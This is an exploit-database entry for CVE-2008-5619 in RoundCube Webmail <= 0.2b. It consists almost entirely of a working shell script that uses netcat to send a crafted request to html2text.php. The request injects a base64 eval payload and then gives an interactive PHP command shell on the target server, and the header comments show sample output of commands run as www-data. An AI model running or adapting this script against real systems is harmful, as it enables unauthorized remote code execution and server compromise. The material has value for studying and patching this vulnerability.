RoundCube Webmail <= 0.2b Remote Code Execution Exploit

2014-07-0100:00:00

Root

www.seebug.org

0.886 High

EPSS

Percentile

98.4%

JSON

No description provided by source.


                                                #!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP&#62; echo(ini_get(&#39;disable_functions&#39;));
#
# exec, system
#
# PHP&#62; passthru(&#34;id; uname -a&#34;);
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#

echo  &#39;Exploit for Roundcube Webmail =&#60; 0.2-beta&#39;
echo  &#39;html2text.php / preg_replace() / eval bug&#39;
echo -e &#39;\r\nby Hunger &#60;[email protected]&#62;\r\n\n&#39;

if [ &#34;$2&#34; = &#34;&#34; ]; then echo &#34;
Usage:
$0 &#60;hostname&#62; &#60;deeplink&#62;

Example:
\$ $0 localhost /roundcube/bin/html2text.php


For https sites use stunnel or socat!
&#34;; exit 1; fi

NETCATEXE=`which nc`
BASE64ENC=`which base64`

if [ &#34;$NETCATEXE&#34; = &#34;&#34; ] || [ &#34;$BASE64ENC&#34; = &#34;&#34; ]; 
then
   echo &#34;Required tool(s) missing... (netcat, base64)&#34;
   exit 2
fi

USERAGENT=&#34;Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)&#34;

MYPAYLOAD=&#34;{\${EVAL(BASE64_DECODE(\$_SERVER[HTTP_ACCEPT]))}}&#34;
EVALEDTAG=&#34;&#60;b&#62;&#34;
EVALEDTAG=$EVALEDTAG$MYPAYLOAD
EVALEDTAG=$EVALEDTAG&#34;&#60;/b&#62;&#34;

PARAMSIZE=54

HOST_NAME=$1
DEEP_LINK=$2
HTTP_PORT=80

HTTPHEADR=&#34;&#34;
HTTPHEADR=$HTTPHEADR&#34;POST $DEEP_LINK HTTP/1.0\r\n&#34;
HTTPHEADR=$HTTPHEADR&#34;Host: $HOST_NAME\r\n&#34;
HTTPHEADR=$HTTPHEADR&#34;User-Agent: $USERAGENT\r\n&#34;
HTTPHEADR=$HTTPHEADR&#34;Content-length: $PARAMSIZE\r\n&#34;
HTTPHEADR=$HTTPHEADR&#34;Accept:&#34;

SPLOITCHK=&#39;Succeeded! :))&#39;
PHPAYLOAD=&#39;echo(&#34;&#39;
PHPAYLOAD=$PHPAYLOAD$SPLOITCHK&#39;\r\n\r\n&#39;
PHPAYLOAD=$PHPAYLOAD&#39;Type PHP functions as shell commands. ;)\r\n&#39;
PHPAYLOAD=$PHPAYLOAD&#39;Use \&#34;exit\&#34; to close session.\r\n\r\n&#39;
PHPAYLOAD=$PHPAYLOAD&#39;Good luck and have phun! ;D\r\n\r\n&#39;
PHPAYLOAD=$PHPAYLOAD&#39;&#34;)&#39;

HTTPOKMSG=&#34;HTTP/1.0 200 OK&#34;
HTTP1KMSG=&#34;HTTP/1.1 200 OK&#34;
RETURNCHR=`echo -e &#34;\r\n&#34;`

echo -n &#34;Trying to exploit... &#34;

f=0; until [ &#34;$PHPAYLOAD&#34; = &#34;exit&#34; ]; do
 PHPAYLOAD=`echo &#34;$PHPAYLOAD;&#34; |$BASE64ENC --wrap=0`
 HTTP_SEND=&#34;$HTTPHEADR $PHPAYLOAD\r\n\r\n$EVALEDTAG&#34;
 HTTP_BACK=`echo -ne &#34;$HTTP_SEND&#34;|$NETCATEXE $HOST_NAME $HTTP_PORT`
 if [ $? != 0 ]; then echo &#34;Connection failed.&#34;; exit 3; fi
 e=0; l=0; echo &#34;$HTTP_BACK&#34; | while read i; do let l++;
   if [ $l = 1 ] && [ &#34;$i&#34; != &#34;$HTTPOKMSG$RETURNCHR&#34; ] \
                 && [ &#34;$i&#34; != &#34;$HTTP1KMSG$RETURNCHR&#34; ]; then
      echo &#34;Bad Server Response :\\&#34;; exit 4; fi;
   if [ $e = 1 ] && [ $f = 0 ] && [ &#34;$i&#34; = &#34;$MYPAYLOAD&#34; ]; then
      echo &#34;Target has been patched /o\\&#34;; exit 4; fi
   if [ $e = 1 ] && [ $f = 0 ] && [ &#34;$i&#34; != &#34;$SPLOITCHK$RETURNCHR&#34; ]; then
      echo -e &#34;Exploitation failed :((&#34;; exit 4; elif
         [ &#34;$i&#34; = &#34;$SPLOITCHK$RETURNCHR&#34; ]; then let f++; fi
   if [ $e -gt 0 ]; then echo &#34;$i&#34;; fi
   if [ &#34;$i&#34; = &#34;$RETURNCHR&#34; ]; then let e++; fi
 done
 if [ $? != 4 ]; then let f++; echo -ne &#34;PHP&#62; &#34;; else
  echo -e &#34;\n\nDump:\n\n$HTTP_BACK&#34;; exit 4; fi;
 read PHPAYLOAD
done

# milw0rm.com [2008-12-22]